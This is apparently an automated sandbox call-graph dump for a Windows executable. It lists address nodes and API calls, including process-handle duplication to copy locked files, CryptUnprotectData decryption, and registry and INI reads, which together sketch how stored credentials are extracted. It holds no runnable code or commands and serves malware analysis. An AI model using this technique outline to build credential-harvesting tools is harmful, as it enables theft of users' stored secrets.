RegCloseKey 38915->38908 38917 40a8d0 7 API calls 38916->38917 38918 40c498 38917->38918 38919 40a8d0 7 API calls 38918->38919 38920 40c4ac memset 38919->38920 38921 40aa1d 38920->38921 38922 40c4e4 RegEnumValueW 38921->38922 38922->38915 38922->38916 39142 405220 38923->39142 38927 4099c6 2 API calls 38926->38927 38928 40a714 _wcslwr 38927->38928 38929 40c634 38928->38929 39199 405361 38929->39199 38932 40c65c wcslen 39202 4053b6 39 API calls 38932->39202 38933 40c71d wcslen 38933->38498 38935 40c677 38936 40c713 38935->38936 39203 40538b 39 API calls 38935->39203 39205 4053df 39 API calls 38936->39205 38939 40c6a5 38939->38936 38940 40c6a9 memset 38939->38940 38941 40c6d3 38940->38941 39204 40c589 44 API calls 38941->39204 38943->38491 38945 40ae18 9 API calls 38944->38945 38951 40c210 38945->38951 38946 40ae51 9 API calls 38946->38951 38947 40c264 38948 40aebe FindClose 38947->38948 38950 40c26f 38948->38950 38949 40add4 2 API calls 38949->38951 38956 40e5ed memset memset 38950->38956 38951->38946 38951->38947 38951->38949 38952 40c231 _wcsicmp 38951->38952 38953 40c1d3 35 API calls 38951->38953 38952->38951 38954 40c248 38952->38954 38953->38951 38969 40c084 22 API calls 38954->38969 38957 414c2e 17 API calls 38956->38957 38958 40e63f 38957->38958 38959 409d1f 6 API calls 38958->38959 38960 40e658 38959->38960 38970 409b98 GetFileAttributesW 38960->38970 38962 40e667 38963 40e680 38962->38963 38964 409d1f 6 API calls 38962->38964 38971 409b98 GetFileAttributesW 38963->38971 38964->38963 38966 40e68f 38967 40c2d8 38966->38967 38972 40e4b2 38966->38972 38967->38879 38967->38880 38969->38951 38970->38962 38971->38966 38993 40e01e 38972->38993 38974 40e593 38975 40e5b0 38974->38975 38976 40e59c DeleteFileW 38974->38976 38977 40b04b ??3@YAXPAX 38975->38977 38976->38975 38979 40e5bb 38977->38979 38978 40e521 38978->38974 39016 40e175 38978->39016 38981 40e5c4 CloseHandle 38979->38981 38982 40e5cc 38979->38982 38981->38982 38984 40b633 free 38982->38984 38983 40e573 38985 40e584 38983->38985 38986 40e57c CloseHandle 38983->38986 38987 40e5db 38984->38987 39059 40b1ab free free 38985->39059 38986->38985 38990 40b633 free 38987->38990 38989 40e540 38989->38983 39036 40e2ab 38989->39036 38991 40e5e3 38990->38991 38991->38967 39060 406214 38993->39060 38996 40e16b 38996->38978 38999 40afcf 2 API calls 39000 40e08d OpenProcess 38999->39000 39001 40e0a4 GetCurrentProcess DuplicateHandle 39000->39001 39005 40e152 39000->39005 39002 40e0d0 GetFileSize 39001->39002 39003 40e14a CloseHandle 39001->39003 39096 409a45 GetTempPathW 39002->39096 39003->39005 39004 40e160 39008 40b04b ??3@YAXPAX 39004->39008 39005->39004 39007 406214 22 API calls 39005->39007 39007->39004 39008->38996 39009 40e0ea 39099 4096dc CreateFileW 39009->39099 39011 40e0f1 CreateFileMappingW 39012 40e140 CloseHandle CloseHandle 39011->39012 39013 40e10b MapViewOfFile 39011->39013 39012->39003 39014 40e13b CloseHandle 39013->39014 39015 40e11f WriteFile UnmapViewOfFile 39013->39015 39014->39012 39015->39014 39017 40e18c 39016->39017 39100 406b90 39017->39100 39020 40e1a7 memset 39026 40e1e8 39020->39026 39021 40e299 39110 4069a3 39021->39110 39027 40e283 39026->39027 39028 40dd50 _wcsicmp 39026->39028 39034 40e244 _snwprintf 39026->39034 39117 406e8f 13 API calls 39026->39117 39118 40742e 8 API calls 39026->39118 39119 40aae3 wcslen wcslen _memicmp 39026->39119 39120 406b53 SetFilePointerEx ReadFile 39026->39120 39029 40e291 39027->39029 39030 40e288 free 39027->39030 39028->39026 39031 40aa04 free 39029->39031 39030->39029 39031->39021 39035 40a8d0 7 API calls 39034->39035 39035->39026 39037 40e2c2 39036->39037 39038 406b90 11 API calls 39037->39038 39044 40e2d3 39038->39044 39039 40e4a0 39040 4069a3 2 API calls 39039->39040 39042 40e4ab 39040->39042 39042->38989 39044->39039 39045 40e489 39044->39045 39048 40dd50 _wcsicmp 39044->39048 39054 40e3e0 memcpy 39044->39054 39055 40e3fb memcpy 39044->39055 39056 40e3b3 wcschr 39044->39056 39057 40e416 memcpy 39044->39057 39058 40e431 memcpy 39044->39058 39121 406e8f 13 API calls 39044->39121 39122 40dd50 _wcsicmp 39044->39122 39131 40742e 8 API calls 39044->39131 39132 406b53 SetFilePointerEx ReadFile 39044->39132 39046 40aa04 free 39045->39046 39047 40e491 39046->39047 39047->39039 39049 40e497 free 39047->39049 39048->39044 39049->39039 39051 40e376 memset 39123 40aa29 39051->39123 39054->39044 39055->39044 39056->39044 39057->39044 39058->39044 39059->38974 39061 406294 CloseHandle 39060->39061 39062 406224 39061->39062 39063 4096c3 CreateFileW 39062->39063 39064 40622d 39063->39064 39065 406281 GetLastError 39064->39065 39066 40a2ef ReadFile 39064->39066 39070 40625a 39065->39070 39067 406244 39066->39067 39067->39065 39068 40624b 39067->39068 39069 406777 19 API calls 39068->39069 39068->39070 39069->39070 39070->38996 39071 40dd85 memset 39070->39071 39072 409bca GetModuleFileNameW 39071->39072 39073 40ddbe CreateFileW 39072->39073 39076 40ddf1 39073->39076 39074 40afcf ??2@YAPAXI ??3@YAXPAX 39074->39076 39075 41352f 9 API calls 39075->39076 39076->39074 39076->39075 39077 40de0b NtQuerySystemInformation 39076->39077 39078 40de3b CloseHandle GetCurrentProcessId 39076->39078 39077->39076 39079 40de54 39078->39079 39080 413d4c 47 API calls 39079->39080 39088 40de88 39080->39088 39081 40e00c 39082 413d29 free FreeLibrary 39081->39082 39083 40e014 39082->39083 39083->38996 39083->38999 39084 40dea9 _wcsicmp 39085 40dee7 OpenProcess 39084->39085 39086 40debd _wcsicmp 39084->39086 39085->39088 39086->39085 39087 40ded0 _wcsicmp 39086->39087 39087->39085 39087->39088 39088->39081 39088->39084 39089 40dfef CloseHandle 39088->39089 39090 40df78 39088->39090 39091 40df23 GetCurrentProcess DuplicateHandle 39088->39091 39094 40df8f CloseHandle 39088->39094 39089->39088 39090->39089 39090->39094 39095 40dfae _wcsicmp 39090->39095 39091->39088 39092 40df4c memset 39091->39092 39093 41352f 9 API calls 39092->39093 39093->39088 39094->39090 39095->39088 39095->39090 39097 409a74 GetTempFileNameW 39096->39097 39098 409a66 GetWindowsDirectoryW 39096->39098 39097->39009 39098->39097 39099->39011 39101 406bd5 39100->39101 39102 406bad 39100->39102 39104 4066bf free malloc memcpy free free 39101->39104 39109 406c0f 39101->39109 39102->39101 39103 406bba _wcsicmp 39102->39103 39103->39101 39103->39102 39105 406be5 39104->39105 39106 40afcf ??2@YAPAXI ??3@YAXPAX 39105->39106 39105->39109 39107 406bff 39106->39107 39108 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39107->39108 39108->39109 39109->39020 39109->39021 39111 4069c4 ??3@YAXPAX 39110->39111 39112 4069af 39111->39112 39113 40b633 free 39112->39113 39114 4069ba 39113->39114 39115 40b04b ??3@YAXPAX 39114->39115 39116 4069c2 39115->39116 39116->38989 39117->39026 39118->39026 39119->39026 39120->39026 39121->39044 39122->39051 39124 40aa33 39123->39124 39125 40aa63 39123->39125 39126 40aa44 39124->39126 39127 40aa38 wcslen 39124->39127 39125->39044 39128 40a9ce malloc memcpy free free 39126->39128 39127->39126 39129 40aa4d 39128->39129 39129->39125 39130 40aa51 memcpy 39129->39130 39130->39125 39131->39044 39132->39044 39134 40a980 39133->39134 39135 40a8bb 39134->39135 39136 40a995 _wcsicmp 39134->39136 39137 40a99c wcscmp 39134->39137 39135->38899 39135->38900 39136->39134 39137->39134 39138->38903 39139->38907 39141 40aa23 RegEnumValueW 39140->39141 39141->38914 39141->38915 39143 405335 39142->39143 39144 40522a 39142->39144 39143->38498 39145 40b2cc 27 API calls 39144->39145 39146 405234 39145->39146 39147 40a804 8 API calls 39146->39147 39148 40523a 39147->39148 39187 40b273 39148->39187 39150 405248 _mbscpy _mbscat GetProcAddress 39151 40b273 27 API calls 39150->39151 39152 405279 39151->39152 39190 405211 GetProcAddress 39152->39190 39154 405282 39155 40b273 27 API calls 39154->39155 39156 40528f 39155->39156 39191 405211 GetProcAddress 39156->39191 39158 405298 39159 40b273 27 API calls 39158->39159 39160 4052a5 39159->39160 39192 405211 GetProcAddress 39160->39192 39162 4052ae 39163 40b273 27 API calls 39162->39163 39164 4052bb 39163->39164 39193 405211 GetProcAddress 39164->39193 39166 4052c4 39167 40b273 27 API calls 39166->39167 39168 4052d1 39167->39168 39194 405211 GetProcAddress 39168->39194 39170 4052da 39171 40b273 27 API calls 39170->39171 39172 4052e7 39171->39172 39195 405211 GetProcAddress 39172->39195 39174 4052f0 39175 40b273 27 API calls 39174->39175 39176 4052fd 39175->39176 39196 405211 GetProcAddress 39176->39196 39178 405306 39179 40b273 27 API calls 39178->39179 39180 405313 39179->39180 39197 405211 GetProcAddress 39180->39197 39182 40531c 39183 40b273 27 API calls 39182->39183 39184 405329 39183->39184 39198 405211 GetProcAddress 39184->39198 39186 405332 39186->39143 39188 40b58d 27 API calls 39187->39188 39189 40b18c 39188->39189 39189->39150 39190->39154 39191->39158 39192->39162 39193->39166 39194->39170 39195->39174 39196->39178 39197->39182 39198->39186 39200 405220 39 API calls 39199->39200 39201 405369 39200->39201 39201->38932 39201->38933 39202->38935 39203->38939 39204->38936 39205->38933 39207 40440c FreeLibrary 39206->39207 39208 40436d 39207->39208 39209 40a804 8 API calls 39208->39209 39210 404377 39209->39210 39211 404383 39210->39211 39212 404405 39210->39212 39213 40b273 27 API calls 39211->39213 39212->38503 39212->38504 39212->38505 39214 40438d GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 4043a7 GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 4043ba GetProcAddress 39217->39218 39219 40b273 27 API calls 39218->39219 39220 4043ce GetProcAddress 39219->39220 39221 40b273 27 API calls 39220->39221 39222 4043e2 GetProcAddress 39221->39222 39223 4043f1 39222->39223 39224 4043f7 39223->39224 39225 40440c FreeLibrary 39223->39225 39224->39212 39225->39212 39227 404413 FreeLibrary 39226->39227 39228 40441e 39226->39228 39227->39228 39228->38520 39229->38516 39231 40447e 39230->39231 39232 40442e 39230->39232 39233 404485 CryptUnprotectData 39231->39233 39234 40449c 39231->39234 39235 40b2cc 27 API calls 39232->39235 39233->39234 39234->38516 39236 404438 39235->39236 39237 40a804 8 API calls 39236->39237 39238 40443e 39237->39238 39239 404445 39238->39239 39240 404467 39238->39240 39241 40b273 27 API calls 39239->39241 39240->39231 39243 404475 FreeLibrary 39240->39243 39242 40444f GetProcAddress 39241->39242 39242->39240 39244 404460 39242->39244 39243->39231 39244->39240 39246 4135f6 39245->39246 39247 4135eb FreeLibrary 39245->39247 39246->38523 39247->39246 39249 4449c4 39248->39249 39250 444a52 39248->39250 39251 40b2cc 27 API calls 39249->39251 39250->38540 39250->38541 39252 4449cb 39251->39252 39253 40a804 8 API calls 39252->39253 39254 4449d1 39253->39254 39255 40b273 27 API calls 39254->39255 39256 4449dc GetProcAddress 39255->39256 39257 40b273 27 API calls 39256->39257 39258 4449f3 GetProcAddress 39257->39258 39259 40b273 27 API calls 39258->39259 39260 444a04 GetProcAddress 39259->39260 39261 40b273 27 API calls 39260->39261 39262 444a15 GetProcAddress 39261->39262 39263 40b273 27 API calls 39262->39263 39264 444a26 GetProcAddress 39263->39264 39265 40b273 27 API calls 39264->39265 39266 444a37 GetProcAddress 39265->39266 39267 40b273 27 API calls 39266->39267 39268 444a48 GetProcAddress 39267->39268 39268->39250 39269->38551 39270->38551 39271->38551 39272->38551 39273->38542 39275 403a29 39274->39275 39289 403bed memset memset 39275->39289 39277 403ae7 39302 40b1ab free free 39277->39302 39279 403a3f memset 39283 403a2f 39279->39283 39280 403aef 39280->38559 39281 40a8d0 7 API calls 39281->39283 39282 409d1f 6 API calls 39282->39283 39283->39277 39283->39279 39283->39281 39283->39282 39284 409b98 GetFileAttributesW 39283->39284 39284->39283 39286 40a051 GetFileTime CloseHandle 39285->39286 39287 4039ca CompareFileTime 39285->39287 39286->39287 39287->38559 39288->38558 39290 414c2e 17 API calls 39289->39290 39291 403c38 39290->39291 39292 409719 2 API calls 39291->39292 39293 403c3f wcscat 39292->39293 39294 414c2e 17 API calls 39293->39294 39295 403c61 39294->39295 39296 409719 2 API calls 39295->39296 39297 403c68 wcscat 39296->39297 39303 403af5 39297->39303 39300 403af5 20 API calls 39301 403c95 39300->39301 39301->39283 39302->39280 39304 403b02 39303->39304 39305 40ae18 9 API calls 39304->39305 39313 403b37 39305->39313 39306 403bdb 39307 40aebe FindClose 39306->39307 39309 403be6 39307->39309 39308 40add4 wcscmp wcscmp 39308->39313 39309->39300 39310 40ae18 9 API calls 39310->39313 39311 40ae51 9 API calls 39311->39313 39312 40aebe FindClose 39312->39313 39313->39306 39313->39308 39313->39310 39313->39311 39313->39312 39314 40a8d0 7 API calls 39313->39314 39314->39313 39316 409d1f 6 API calls 39315->39316 39317 404190 39316->39317 39330 409b98 GetFileAttributesW 39317->39330 39319 40419c 39320 4041a7 6 API calls 39319->39320 39321 40435c 39319->39321 39323 40424f 39320->39323 39321->38585 39323->39321 39324 40425e memset 39323->39324 39326 409d1f 6 API calls 39323->39326 39327 40a8ab 9 API calls 39323->39327 39331 414842 39323->39331 39324->39323 39325 404296 wcscpy 39324->39325 39325->39323 39326->39323 39328 4042b6 memset memset _snwprintf wcscpy 39327->39328 39328->39323 39329->38583 39330->39319 39334 41443e 39331->39334 39333 414866 39333->39323 39335 41444b 39334->39335 39336 414451 39335->39336 39337 4144a3 GetPrivateProfileStringW 39335->39337 39338 414491 39336->39338 39339 414455 wcschr 39336->39339 39337->39333 39341 414495 WritePrivateProfileStringW 39338->39341 39339->39338 39340 414463 _snwprintf 39339->39340 39340->39341 39341->39333 39342->38589 39344 40b2cc 27 API calls 39343->39344 39345 409615 39344->39345 39346 409d1f 6 API calls 39345->39346 39347 409625 39346->39347 39372 409b98 GetFileAttributesW 39347->39372 39349 409634 39350 409648 39349->39350 39373 4091b8 memset 39349->39373 39352 40b2cc 27 API calls 39350->39352 39355 408801 39350->39355 39353 40965d 39352->39353 39354 409d1f 6 API calls 39353->39354 39356 40966d 39354->39356 39355->38592 39355->38619 39425 409b98 GetFileAttributesW 39356->39425 39358 40967c 39358->39355 39359 409681 39358->39359 39426 409529 72 API calls 39359->39426 39361 409690 39361->39355 39362->38614 39372->39349 39427 40a6e6 WideCharToMultiByte 39373->39427 39375 409202 39428 444432 39375->39428 39378 40b273 27 API calls 39379 409236 39378->39379 39474 438552 39379->39474 39382 409383 39384 40b273 27 API calls 39382->39384 39385 409399 39384->39385 39388 438552 134 API calls 39385->39388 39406 4093a3 39388->39406 39392 4094ff 39405 40951d 39405->39350 39406->39392 39425->39358 39426->39361 39427->39375 39524 4438b5 39428->39524 39430 44444c 39431 409215 39430->39431 39538 415a6d 39430->39538 39431->39378 39431->39405 39433 4442e6 11 API calls 39435 44469e 39433->39435 39434 444486 39436 4444b9 memcpy 39434->39436 39473 4444a4 39434->39473 39435->39431 39438 443d90 111 API calls 39435->39438 39542 415258 39436->39542 39438->39431 39439 444524 39440 444541 39439->39440 39441 44452a 39439->39441 39545 444316 39440->39545 39442 416935 16 API calls 39441->39442 39442->39473 39445 444316 18 API calls 39446 444563 39445->39446 39447 444316 18 API calls 39446->39447 39473->39433 39663 438460 39474->39663 39476 409240 39476->39382 39477 4251c4 39476->39477 39714 424f07 39477->39714 39479 4251e4 39525 4438d0 39524->39525 39535 4438c9 39524->39535 39612 415378 memcpy memcpy 39525->39612 39535->39430 39539 415a77 39538->39539 39540 415a8d 39539->39540 39541 415a7e memset 39539->39541 39540->39434 39541->39540 39543 4438b5 11 API calls 39542->39543 39544 41525d 39543->39544 39544->39439 39546 444328 39545->39546 39547 444423 39546->39547 39548 44434e 39546->39548 39613 4446ea 11 API calls 39547->39613 39549 432d4e 3 API calls 39548->39549 39551 44435a 39549->39551 39553 444375 39551->39553 39558 44438b 39551->39558 39552 432d4e 3 API calls 39554 4443ec 39552->39554 39555 416935 16 API calls 39553->39555 39556 444381 39554->39556 39557 416935 16 API calls 39554->39557 39555->39556 39556->39445 39557->39556 39558->39552 39613->39556 39675 41703f 39663->39675 39665 43847a 39666 43848a 39665->39666 39667 43847e 39665->39667 39682 438270 39666->39682 39712 4446ea 11 API calls 39667->39712 39672 4384bb 39674 438488 39674->39476 39676 417044 39675->39676 39677 41705c 39675->39677 39679 416760 11 API calls 39676->39679 39681 417055 39676->39681 39678 417075 39677->39678 39680 41707a 11 API calls 39677->39680 39678->39665 39679->39681 39680->39676 39681->39665 39683 415a91 memset 39682->39683 39684 43828d 39683->39684 39685 438297 39684->39685 39686 438341 39684->39686 39688 4382d6 39684->39688 39687 415c7d 16 API calls 39685->39687 39689 44358f 19 API calls 39686->39689 39690 438458 39687->39690 39691 4382fb 39688->39691 39692 4382db 39688->39692 39702 438318 39689->39702 39690->39674 39713 424f26 123 API calls 39690->39713 39694 415c23 memcpy 39691->39694 39693 416935 16 API calls 39692->39693 39695 4382e9 39693->39695 39696 438305 39694->39696 39697 415c7d 16 API calls 39695->39697 39699 44358f 19 API calls 39696->39699 39696->39702 39697->39685 39698 438373 39701 438383 39698->39701 39703 4300e8 memset memset memcpy 39698->39703 39699->39702 39700 43819e 115 API calls 39700->39698 39702->39698 39702->39700 39703->39701 39712->39674 39713->39672 39715 424f1f 39714->39715 39716 424f0c 39714->39716 39735 424eea 11 API calls 39715->39735 39734 416760 11 API calls 39716->39734 39719 424f18 39719->39479 39720 424f24 39720->39479 39734->39719 39735->39720 39813 413f4f 39786->39813 39789 413f37 K32GetModuleFileNameExW 39790 413f4a 39789->39790 39790->38649 39792 413969 wcscpy 39791->39792 39793 41396c wcschr 39791->39793 39796 413a3a 39792->39796 39793->39792 39795 41398e 39793->39795 39818 4097f7 wcslen wcslen _memicmp 39795->39818 39796->38649 39798 41399a 39799 4139a4 memset 39798->39799 39800 4139e6 39798->39800 39819 409dd5 GetWindowsDirectoryW wcscpy 39799->39819 39802 413a31 wcscpy 39800->39802 39803 4139ec memset 39800->39803 39802->39796 39820 409dd5 GetWindowsDirectoryW wcscpy 39803->39820 39804 4139c9 wcscpy wcscat 39804->39796 39806 413a11 memcpy wcscat 39806->39796 39808 413cb0 GetModuleHandleW 39807->39808 39809 413cda 39807->39809 39808->39809 39812 413cbf GetProcAddress 39808->39812 39810 413ce3 GetProcessTimes 39809->39810 39811 413cf6 39809->39811 39810->38655 39811->38655 39812->39809 39814 413f2f 39813->39814 39815 413f54 39813->39815 39814->39789 39814->39790 39816 40a804 8 API calls 39815->39816 39817 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39816->39817 39817->39814 39818->39798 39819->39804 39820->39806 39821->38675 39822->38699 39824 409cf9 GetVersionExW 39823->39824 39825 409d0a 39823->39825 39824->39825 39825->38704 39825->38710 39826->38711 39827->38715 39828->38717 39829->38783 39831 40bba5 39830->39831 39875 40cc26 39831->39875 39834 40bd4b 39896 40cc0c 39834->39896 39839 40b2cc 27 API calls 39840 40bbef 39839->39840 39903 40ccf0 _wcsicmp 39840->39903 39842 40bbf5 39842->39834 39904 40ccb4 6 API calls 39842->39904 39844 40bc26 39845 40cf04 17 API calls 39844->39845 39846 40bc2e 39845->39846 39847 40bd43 39846->39847 39848 40b2cc 27 API calls 39846->39848 39849 40cc0c 4 API calls 39847->39849 39850 40bc40 39848->39850 39849->39834 39905 40ccf0 _wcsicmp 39850->39905 39852 40bc46 39852->39847 39853 40bc61 memset memset WideCharToMultiByte 39852->39853 39906 40103c strlen 39853->39906 39855 40bcc0 39856 40b273 27 API calls 39855->39856 39857 40bcd0 memcmp 39856->39857 39857->39847 39858 40bce2 39857->39858 39859 404423 38 API calls 39858->39859 39860 40bd10 39859->39860 39860->39847 39861 40bd3a LocalFree 39860->39861 39862 40bd1f memcpy 39860->39862 39861->39847 39862->39861 39863->38798 39864->38835 39865->38835 39866->38835 39867->38835 39868->38835 39869->38835 39870->38835 39871->38835 39872->38835 39873->38810 39874->38832 39907 4096c3 CreateFileW 39875->39907 39877 40cc34 39878 40cc3d GetFileSize 39877->39878 39886 40bbca 39877->39886 39879 40afcf 2 API calls 39878->39879 39880 40cc64 39879->39880 39908 40a2ef ReadFile 39880->39908 39882 40cc71 39909 40ab4a MultiByteToWideChar 39882->39909 39884 40cc95 CloseHandle 39885 40b04b ??3@YAXPAX 39884->39885 39885->39886 39886->39834 39887 40cf04 39886->39887 39888 40b633 free 39887->39888 39889 40cf14 39888->39889 39915 40b1ab free free 39889->39915 39891 40cf1b 39892 40cfef 39891->39892 39895 40bbdd 39891->39895 39916 40cd4b 39891->39916 39894 40cd4b 14 API calls 39892->39894 39894->39895 39895->39834 39895->39839 39897 40b633 free 39896->39897 39898 40cc15 39897->39898 39899 40aa04 free 39898->39899 39900 40cc1d 39899->39900 39957 40b1ab free free 39900->39957 39902 40b7d4 memset CreateFileW 39902->38790 39902->38791 39903->39842 39904->39844 39905->39852 39906->39855 39907->39877 39908->39882 39910 40ab93 39909->39910 39911 40ab6b 39909->39911 39910->39884 39912 40a9ce 4 API calls 39911->39912 39913 40ab74 39912->39913 39914 40ab7c MultiByteToWideChar 39913->39914 39914->39910 39915->39891 39917 40cd7b 39916->39917 39918 40aa29 6 API calls 39917->39918 39922 40cd89 39918->39922 39919 40cef5 39920 40aa04 free 39919->39920 39921 40cefd 39920->39921 39921->39891 39922->39919 39923 40aa29 6 API calls 39922->39923 39924 40ce1d 39923->39924 39925 40aa29 6 API calls 39924->39925 39926 40ce3e 39925->39926 39927 40ce6a 39926->39927 39950 40abb7 wcslen memmove 39926->39950 39928 40ce9f 39927->39928 39953 40abb7 wcslen memmove 39927->39953 39931 40a8d0 7 API calls 39928->39931 39934 40ceb5 39931->39934 39932 40ce56 39951 40aa71 wcslen 39932->39951 39933 40ce8b 39954 40aa71 wcslen 39933->39954 39938 40a8d0 7 API calls 39934->39938 39937 40ce5e 39952 40abb7 wcslen memmove 39937->39952 39941 40cecb 39938->39941 39939 40ce93 39955 40abb7 wcslen memmove 39939->39955 39956 40d00b malloc memcpy free free 39941->39956 39944 40cedd 39945 40aa04 free 39944->39945 39946 40cee5 39945->39946 39947 40aa04 free 39946->39947 39948 40ceed 39947->39948 39949 40aa04 free 39948->39949 39949->39919 39950->39932 39951->39937 39952->39927 39953->39933 39954->39939 39955->39928 39956->39944 39957->39902 39958->38850 39959->38858 39960 4147f3 39963 414561 39960->39963 39962 414813 39964 41456d 39963->39964 39965 41457f GetPrivateProfileIntW 39963->39965 39968 4143f1 memset _itow WritePrivateProfileStringW 39964->39968 39965->39962 39967 41457a 39967->39962 39968->39967 39969 44def7 39970 44df07 39969->39970 39971 44df00 ??3@YAXPAX 39969->39971 39972 44df17 39970->39972 39973 44df10 ??3@YAXPAX 39970->39973 39971->39970 39974 44df27 39972->39974 39975 44df20 ??3@YAXPAX 39972->39975 39973->39972 39976 44df37 39974->39976 39977 44df30 ??3@YAXPAX 39974->39977 39975->39974 39977->39976 39978 4148b6 FindResourceW 39979 4148cf SizeofResource 39978->39979 39982 4148f9 39978->39982 39980 4148e0 LoadResource 39979->39980 39979->39982 39981 4148ee LockResource 39980->39981 39980->39982 39981->39982 39983 441b3f 39993 43a9f6 39983->39993 39985 441b61 40166 4386af memset 39985->40166 39987 44189a 39988 442bd4 39987->39988 39989 4418e2 39987->39989 39990 4418ea 39988->39990 40168 441409 memset 39988->40168 39989->39990 40167 4414a9 12 API calls 39989->40167 39994 43aa20 39993->39994 39995 43aadf 39993->39995 39994->39995 39996 43aa34 memset 39994->39996 39995->39985 39997 43aa56 39996->39997 39998 43aa4d 39996->39998 40169 43a6e7 39997->40169 40177 42c02e memset 39998->40177 40003 43aad3 40179 4169a7 11 API calls 40003->40179 40004 43aaae 40004->39995 40004->40003 40019 43aae5 40004->40019 40006 43ac18 40008 43ac47 40006->40008 40181 42bbd5 memcpy memcpy memcpy memset memcpy 40006->40181 40009 43aca8 40008->40009 40182 438eed 16 API calls 40008->40182 40013 43acd5 40009->40013 40184 4233ae 11 API calls 40009->40184 40012 43ac87 40183 4233c5 16 API calls 40012->40183 40185 423426 11 API calls 40013->40185 40017 43ace1 40186 439811 163 API calls 40017->40186 40018 43a9f6 161 API calls 40018->40019 40019->39995 40019->40006 40019->40018 40180 439bbb 22 API calls 40019->40180 40021 43acfd 40027 43ad2c 40021->40027 40187 438eed 16 API calls 40021->40187 40023 43ad19 40188 4233c5 16 API calls 40023->40188 40025 43ad58 40189 44081d 163 API calls 40025->40189 40027->40025 40029 43add9 40027->40029 40029->40029 40193 423426 11 API calls 40029->40193 40030 43ae3a memset 40031 43ae73 40030->40031 40194 42e1c0 147 API calls 40031->40194 40032 43adab 40191 438c4e 163 API calls 40032->40191 40034 43ad6c 40034->39995 40034->40032 40190 42370b memset memcpy memset 40034->40190 40036 43ae96 40195 42e1c0 147 API calls 40036->40195 40038 43adcc 40192 440f84 12 API calls 40038->40192 40041 43aea8 40042 43aec1 40041->40042 40196 42e199 147 API calls 40041->40196 40044 43af00 40042->40044 40197 42e1c0 147 API calls 40042->40197 40044->39995 40047 43af1a 40044->40047 40048 43b3d9 40044->40048 40198 438eed 16 API calls 40047->40198 40053 43b3f6 40048->40053 40060 43b4c8 40048->40060 40050 43b60f 40050->39995 40257 4393a5 17 API calls 40050->40257 40051 43af2f 40199 4233c5 16 API calls 40051->40199 40239 432878 12 API calls 40053->40239 40055 43af51 40200 423426 11 API calls 40055->40200 40058 43af7d 40201 423426 11 API calls 40058->40201 40059 43b4f2 40246 43a76c 21 API calls 40059->40246 40060->40059 40245 42bbd5 memcpy memcpy memcpy memset memcpy 40060->40245 40064 43b529 40247 44081d 163 API calls 40064->40247 40065 43b428 40093 43b462 40065->40093 40240 432b60 16 API calls 40065->40240 40066 43af94 40202 423330 11 API calls 40066->40202 40070 43b47e 40073 43b497 40070->40073 40242 42374a memcpy memset memcpy memcpy memcpy 40070->40242 40071 43b544 40081 43b55c 40071->40081 40248 42c02e memset 40071->40248 40072 43afca 40203 423330 11 API calls 40072->40203 40243 4233ae 11 API calls 40073->40243 40078 43afdb 40204 4233ae 11 API calls 40078->40204 40080 43b4b1 40244 423399 11 API calls 40080->40244 40249 43a87a 163 API calls 40081->40249 40083 43b56c 40086 43b58a 40083->40086 40250 423330 11 API calls 40083->40250 40085 43afee 40205 44081d 163 API calls 40085->40205 40251 440f84 12 API calls 40086->40251 40088 43b4c1 40253 42db80 163 API calls 40088->40253 40092 43b592 40252 43a82f 16 API calls 40092->40252 40241 423330 11 API calls 40093->40241 40096 43b5b4 40254 438c4e 163 API calls 40096->40254 40098 43b5cf 40255 42c02e memset 40098->40255 40100 43b005 40100->39995 40105 43b01f 40100->40105 40206 42d836 163 API calls 40100->40206 40101 43b1ef 40216 4233c5 16 API calls 40101->40216 40103 43b212 40217 423330 11 API calls 40103->40217 40105->40101 40214 423330 11 API calls 40105->40214 40215 42d71d 163 API calls 40105->40215 40107 43add4 40107->40050 40256 438f86 16 API calls 40107->40256 40110 43b087 40207 4233ae 11 API calls 40110->40207 40111 43b22a 40218 42ccb5 11 API calls 40111->40218 40114 43b10f 40210 423330 11 API calls 40114->40210 40115 43b23f 40219 4233ae 11 API calls 40115->40219 40117 43b257 40220 4233ae 11 API calls 40117->40220 40121 43b129 40211 4233ae 11 API calls 40121->40211 40122 43b26e 40221 4233ae 11 API calls 40122->40221 40124 43b09a 40124->40114 40208 42cc15 19 API calls 40124->40208 40209 4233ae 11 API calls 40124->40209 40126 43b282 40222 43a87a 163 API calls 40126->40222 40128 43b13c 40212 440f84 12 API calls 40128->40212 40130 43b29d 40223 423330 11 API calls 40130->40223 40133 43b15f 40213 4233ae 11 API calls 40133->40213 40134 43b2af 40136 43b2b8 40134->40136 40137 43b2ce 40134->40137 40224 4233ae 11 API calls 40136->40224 40225 440f84 12 API calls 40137->40225 40140 43b2c9 40227 4233ae 11 API calls 40140->40227 40141 43b2da 40226 42370b memset memcpy memset 40141->40226 40144 43b2f9 40228 423330 11 API calls 40144->40228 40146 43b30b 40229 423330 11 API calls 40146->40229 40148 43b325 40230 423399 11 API calls 40148->40230 40150 43b332 40231 4233ae 11 API calls 40150->40231 40152 43b354 40232 423399 11 API calls 40152->40232 40154 43b364 40233 43a82f 16 API calls 40154->40233 40156 43b370 40234 42db80 163 API calls 40156->40234 40158 43b380 40235 438c4e 163 API calls 40158->40235 40160 43b39e 40236 423399 11 API calls 40160->40236 40162 43b3ae 40237 43a76c 21 API calls 40162->40237 40164 43b3c3 40238 423399 11 API calls 40164->40238 40166->39987 40167->39990 40168->39988 40170 43a6f5 40169->40170 40176 43a765 40169->40176 40170->40176 40258 42a115 40170->40258 40174 43a73d 40175 42a115 147 API calls 40174->40175 40174->40176 40175->40176 40176->39995 40178 4397fd memset 40176->40178 40177->39997 40178->40004 40179->39995 40180->40019 40181->40008 40182->40012 40183->40009 40184->40013 40185->40017 40186->40021 40187->40023 40188->40027 40189->40034 40190->40032 40191->40038 40192->40107 40193->40030 40194->40036 40195->40041 40196->40042 40197->40042 40198->40051 40199->40055 40200->40058 40201->40066 40202->40072 40203->40078 40204->40085 40205->40100 40206->40110 40207->40124 40208->40124 40209->40124 40210->40121 40211->40128 40212->40133 40213->40105 40214->40105 40215->40105 40216->40103 40217->40111 40218->40115 40219->40117 40220->40122 40221->40126 40222->40130 40223->40134 40224->40140 40225->40141 40226->40140 40227->40144 40228->40146 40229->40148 40230->40150 40231->40152 40232->40154 40233->40156 40234->40158 40235->40160 40236->40162 40237->40164 40238->40107 40239->40065 40240->40093 40241->40070 40242->40073 40243->40080 